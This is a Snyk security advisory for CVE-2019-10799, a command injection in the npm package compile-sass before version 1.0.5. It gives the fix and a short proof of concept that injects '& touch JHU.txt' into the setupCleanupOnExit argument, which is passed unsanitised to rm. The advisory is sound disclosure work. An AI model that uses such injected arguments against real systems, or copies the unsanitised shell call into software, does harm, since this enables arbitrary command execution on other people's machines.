Command Injection Affecting compile-sass package, versions <1.0.5


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
1.14% (85th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Command Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-COMPILESASS-551804
  • published21 Feb 2020
  • disclosed21 Feb 2020
  • creditJHU System Security Lab

Introduced: 21 Feb 2020

CVE-2019-10799  (opens in a new tab)
CWE-78  (opens in a new tab)
First added by Snyk

How to fix?

Upgrade compile-sass to version 1.0.5 or higher.

Overview

compile-sass is a module to compile SASS on-the-fly and/or save it to CSS files.

Affected versions of this package are vulnerable to Command Injection. The function setupCleanupOnExit(cssPath) within dist/index.js is executed as part of the rm command without any sanitization.

PoC by JHU System Security Lab

function sleep(millis) {
    return new Promise(resolve => setTimeout(resolve, millis));
}
async function main(){
    var a = require('compile-sass');
    a.setupCleanupOnExit('& touch JHU.txt');
    console.log('Press Ctrl-C in 3 seconds...')
    await sleep(3000);
}
main();

References

CVSS Scores

version 3.1